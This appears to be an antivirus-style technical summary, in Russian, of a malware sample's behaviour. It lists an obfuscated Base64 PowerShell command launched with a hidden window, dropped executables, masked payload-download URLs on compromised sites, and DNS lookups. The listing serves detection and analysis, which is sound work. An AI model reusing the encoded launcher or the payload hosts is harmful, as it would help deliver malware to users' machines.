Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBlAFQALQBpAHQAZQBNACAAdgBBAFIASQBhAEIATABlADoAbgBpADcAOABFACAAKAAgAFsAdAB5AFAAZQBdACgAIgB7ADMAfQB7ADUAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQAiAC0AZgAnAFMAdABFAE0ALgBpACcALA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\1185701.cvr
- %HOMEPATH%\yqqsz8u\m8q3a_i\iomnei9bz.exe
- %HOMEPATH%\yqqsz8u\m8q3a_i\iomnei9bz.exe
- %HOMEPATH%\yqqsz8u\m8q3a_i\iomnei9bz.exe
- http://www.dr####asreedhar.com/wordpress/x/
- http://4g###dloom.com/indexing/d/
- http://bu####sgateway.com/yaV/
- http://kv##edu.org/wp-includes/MeYsTO/
- http://www.to###ami.com/COPYRIGHT/nVYnWoq/
- http://to###ami.com/COPYRIGHT/nVYnWoq/
- http://hu####atviet.com/wp-content/k/
- DNS ASK dr####asreedhar.com
- DNS ASK 4g###dloom.com
- DNS ASK bu####sgateway.com
- DNS ASK pi####delcielo.com
- DNS ASK kv##edu.org
- DNS ASK to###ami.com
- DNS ASK hu####atviet.com
- DNS ASK wh####oors.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBlAFQALQBpAHQAZQBNACAAdgBBAFIASQBhAEIATABlADoAbgBpADcAOABFACAAKAAgAFsAdAB5AFAAZQBdACgAIgB7ADMAfQB7ADUAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQAiAC0AZgAnAFMAdABFAE0ALgBpACcALA...' (со скрытым окном)